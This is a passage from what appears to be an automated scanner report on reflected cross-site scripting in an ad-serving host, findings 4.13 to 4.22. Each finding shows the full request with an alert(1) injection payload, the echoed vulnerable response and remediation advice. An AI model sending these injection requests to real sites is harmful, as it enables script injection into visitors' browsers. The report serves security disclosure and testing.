Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general/archive9f21e'-alert(1)-'99f2e7ff;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 492
Date: Tue, 10 May 2011 13:36:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general/archive9f21e'-alert(1)-'99f2e7ff;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/ns.androidcentral/general/archive [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bf1'-alert(1)-'e03c47fd222 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150?&17bf1'-alert(1)-'e03c47fd222=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 499
Date: Tue, 10 May 2011 13:36:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:30 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150?&17bf1'-alert(1)-'e03c47fd222=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/ns.androidcentral/general/archive [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62ba3'-alert(1)-'f387749da89 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;ord=2250960881356150?62ba3'-alert(1)-'f387749da89 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 496
Date: Tue, 10 May 2011 13:36:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:36:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.androidcentral/general/archive;ppos=btf;kw=;tile=2;sz=300x250,336x280;net=ns;ord=2250960881356150?62ba3'-alert(1)-'f387749da89;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 275b8'-alert(1)-'b4357d79cc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile275b8'-alert(1)-'b4357d79cc9/general;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 478
Date: Tue, 10 May 2011 13:39:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:39:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile275b8'-alert(1)-'b4357d79cc9/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/ns.knowyourmobile/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bd58'-alert(1)-'634864f9bca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile/general2bd58'-alert(1)-'634864f9bca;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 478
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:39:13 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:39:13 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile/general2bd58'-alert(1)-'634864f9bca;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/adj/ns.knowyourmobile/general [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd0b5'-alert(1)-'e62edcfbb0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736?&fd0b5'-alert(1)-'e62edcfbb0d=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 482
Date: Tue, 10 May 2011 13:39:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:39:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736?&fd0b5'-alert(1)-'e62edcfbb0d=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.18. http://a.collective-media.net/adj/ns.knowyourmobile/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.knowyourmobile/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94826'-alert(1)-'a4712a312f9 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;ord=2513010054826736?94826'-alert(1)-'a4712a312f9 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 479
Date: Tue, 10 May 2011 13:38:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:38:26 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.knowyourmobile/general;ppos=atf;kw=;tile=2;sz=728x90;net=ns;ord=2513010054826736?94826'-alert(1)-'a4712a312f9;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.19. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 632cc'-alert(1)-'15cfcf94192 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear632cc'-alert(1)-'15cfcf94192/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:14 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:14 GMT
Content-Length: 950

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.slashgear632cc'-alert(1)-'15cfcf94192/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ
...[SNIP]...

4.20. http://a.collective-media.net/adj/ns.slashgear/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deea5'-alert(1)-'f23de541341 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear/generaldeea5'-alert(1)-'f23de541341;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:17 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:17 GMT
Content-Length: 950

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/ns.slashgear/generaldeea5'-alert(1)-'f23de541341;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;net=ns;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb
...[SNIP]...

4.21. http://a.collective-media.net/adj/ns.slashgear/general [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1608b'-alert(1)-'2318f0b3e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?&1608b'-alert(1)-'2318f0b3e1a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:34:07 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:34:07 GMT
Content-Length: 954

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
MjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?&1608b'-alert(1)-'2318f0b3e1a=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.22. http://a.collective-media.net/adj/ns.slashgear/general [ppos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/ns.slashgear/general

Issue detail

The value of the ppos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62ff5'-alert(1)-'fb180e95c54 was submitted in the ppos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/ns.slashgear/general;ppos=atf;kw=;tile=1;dcopt=ist;sz=728x90;ampc=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBGPgtMDrJTauSLMj0lAeZ-MGLBfKG-8sBAAAAEAEg3KOGAjgAWMKLheATYMmGhYmIpIQQsgERd3d3LnNsYXNoZ2Vhci5jb226AQlnZnBfaW1hZ2XIAQnaAVVodHRwOi8vd3d3LnNsYXNoZ2Vhci5jb20vc2Ftc3VuZy1nYWxheHktdGFiLTEwLTEtaGFuZHMtb24tYXQtZ29vZ2xlLWlvLTIwMTEtMDkxNTEwMjcvmAKIJ8ACAuACAOoCGFNsYXNoR2Vhci03Mjh4OTAtUHJpbWFyefgC8NEekAOkA5gDpAOoAwHgBAE%26num%3D0%26sig%3DAGiWqtzXozm10NV5RS71pypP48jN1u48ug%26client%3Dca-pub-3201252381583585%26adurl%3D;ord=8602318128105253?62ff5'-alert(1)-'fb180e95c54 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/banners/tier1_728x90.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 10 May 2011 13:33:32 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 09-Jun-2011 13:33:32 GMT
Content-Length: 951

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
